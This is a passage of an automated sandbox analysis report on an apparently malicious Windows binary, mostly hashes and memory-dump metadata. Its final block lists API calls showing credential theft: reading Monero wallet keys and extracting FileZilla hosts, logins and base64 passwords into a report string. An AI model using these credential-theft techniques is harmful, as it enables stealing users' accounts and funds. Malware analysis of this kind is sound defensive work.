                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 1Zw$|z
                        • API String ID: 0-2028459316
                        • Opcode ID: 49e53d3f84d7055c151b1cf03af6ef02a48cc0f9bd09b17325e5e847f0c49eb5
                        • Instruction ID: bee9e9b0cf2524be0040d3c8ab49cb073947f796a5bc45630f0d6d5f70d657ad
                        • Opcode Fuzzy Hash: 49e53d3f84d7055c151b1cf03af6ef02a48cc0f9bd09b17325e5e847f0c49eb5
                        • Instruction Fuzzy Hash: 45B206F360C214AFE3046E2DEC4567AFBE9EF94720F1A892DE6C4C7744E63598018697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: UO$x{7
                        • API String ID: 0-2793752487
                        • Opcode ID: 4e15a45ef3065c64df6613f475f33d72dcb7e6c1a7fa40d651635702e775b8e8
                        • Instruction ID: d5cd7dc131138cd01a67ef54d9136c23534fa0b3ab2f33557ccc9a47f5c84e90
                        • Opcode Fuzzy Hash: 4e15a45ef3065c64df6613f475f33d72dcb7e6c1a7fa40d651635702e775b8e8
                        • Instruction Fuzzy Hash: BB222BF3A082046FE3006E2DDC4566BBBDAEFD4320F1A8A3DE6C4D7744E53598058693
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: XP~
                        • API String ID: 0-3485761663
                        • Opcode ID: 9a186b63f3bdea21796f17520f6660c2391a5f99676b62d0603e7501f8d521c4
                        • Instruction ID: 47a5f17281d0807ed84d1504298f5cce40ecc71ea01de4e131ecf5f7117fcfeb
                        • Opcode Fuzzy Hash: 9a186b63f3bdea21796f17520f6660c2391a5f99676b62d0603e7501f8d521c4
                        • Instruction Fuzzy Hash: 917117F3E083045BE3049E3DDD8536AB7D6DBD4310F2B823D9B8887789E97A5C098685
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: VBB
                        • API String ID: 0-4113321273
                        • Opcode ID: cf942596a124dac04351a1aabefedce5cf946e1c685a582e895cf96770a9db82
                        • Instruction ID: ff955c27a46fec33d1e8a4ba0a43ba81bd038704202fe0775f55f5977fb7e205
                        • Opcode Fuzzy Hash: cf942596a124dac04351a1aabefedce5cf946e1c685a582e895cf96770a9db82
                        • Instruction Fuzzy Hash: AB4139F3B082145BF308AA2DEC557BBBBD5DB94360F1B463CEA88D7784D93998014386
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0[C{
                        • API String ID: 0-2902807198
                        • Opcode ID: ce47189d2a1ccef21ea35e7c343d159db75cfc93ca2544f3f2099679bf7b72cc
                        • Instruction ID: 715100454a24b047ce41a42f6e2f1cfe77ca2dfe62efe7e02f984d38730c3179
                        • Opcode Fuzzy Hash: ce47189d2a1ccef21ea35e7c343d159db75cfc93ca2544f3f2099679bf7b72cc
                        • Instruction Fuzzy Hash: AC3147B390C245EFD3086D669C1557BB6F8EB24351F32093EE983D7780EE65680562D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5acf425412999e554055eabb340e634563c85d4da272c1bfabff6f3307d8d2ff
                        • Instruction ID: 592be38e8b348fa7153ac93fcfe0ad57f56fcddb2b1bd9928a92fa3fd9a03d5e
                        • Opcode Fuzzy Hash: 5acf425412999e554055eabb340e634563c85d4da272c1bfabff6f3307d8d2ff
                        • Instruction Fuzzy Hash: 158113F3E042205BE3146A2DEC4576ABBD6DBD0320F1B463DDEC8A3784E9795C0982D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fa2a236cc31ab9dbc0b0b895175969d1fb49bc66b59f70ace26b9c5665299077
                        • Instruction ID: 5cf582062bfa6a4c601720d103a7f5b567d9eed427a9ecc7623675f4df8bb2f6
                        • Opcode Fuzzy Hash: fa2a236cc31ab9dbc0b0b895175969d1fb49bc66b59f70ace26b9c5665299077
                        • Instruction Fuzzy Hash: C971B1F3A087149FE704AF29D84572AFBE6EF94360F16893DDAC447384EA351845CB86
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 713bd3bd29772426eb59746cf35aa1a87d6192988762e0d9666044fe856bff1e
                        • Instruction ID: d13ac1d14bdb35ed925552d7adcd93a5b3223a7d173553a6a7b63f2905330963
                        • Opcode Fuzzy Hash: 713bd3bd29772426eb59746cf35aa1a87d6192988762e0d9666044fe856bff1e
                        • Instruction Fuzzy Hash: 04613DF3E082005BE3046A2DDD9473AB7D6EFD4710F1A453DEA8993784E9795C098693
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 78680fb6153de89ab9d54c4254266e80c628db5807cf52bdc2f8832ab26492b1
                        • Instruction ID: 0cd94cd52829a748678294b04ec835f794a20ceabfb2dd3d2a426d57d11044ac
                        • Opcode Fuzzy Hash: 78680fb6153de89ab9d54c4254266e80c628db5807cf52bdc2f8832ab26492b1
                        • Instruction Fuzzy Hash: D1511CB3E083105BE3145E39EC8876ABBD5ABD0320F2B463DEAD8577C0E9395D458786
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 53130a542b49a5bd6672930dc38122193b88f77e89714c2653f34fd50aef9632
                        • Instruction ID: 6530c7107546189cc17c68f7a4d8298bf7e22ee7d0181a73340a0b41b09a8198
                        • Opcode Fuzzy Hash: 53130a542b49a5bd6672930dc38122193b88f77e89714c2653f34fd50aef9632
                        • Instruction Fuzzy Hash: 393137F3A087005FE34CAA5AECD636AB6D7DBD8311F1AC03D9B8987388FD755901419A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006E8E0B
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,006F0DBA,006F0DB7,006F0DB6,006F0DB3), ref: 006E0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 006E0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 006E03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 006E0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 006E0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 006E0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 006E0571
                        • lstrcat.KERNEL32(?,url: ), ref: 006E0580
                        • lstrcat.KERNEL32(?,00000000), ref: 006E0593
                        • lstrcat.KERNEL32(?,006F1678), ref: 006E05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 006E05B5
                        • lstrcat.KERNEL32(?,006F167C), ref: 006E05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 006E05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 006E05E6
                        • lstrcat.KERNEL32(?,006F1688), ref: 006E05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 006E0604
                        • lstrcat.KERNEL32(?,00000000), ref: 006E0617
                        • lstrcat.KERNEL32(?,006F1698), ref: 006E0626
                        • lstrcat.KERNEL32(?,006F169C), ref: 006E0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006F0DB2), ref: 006E068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
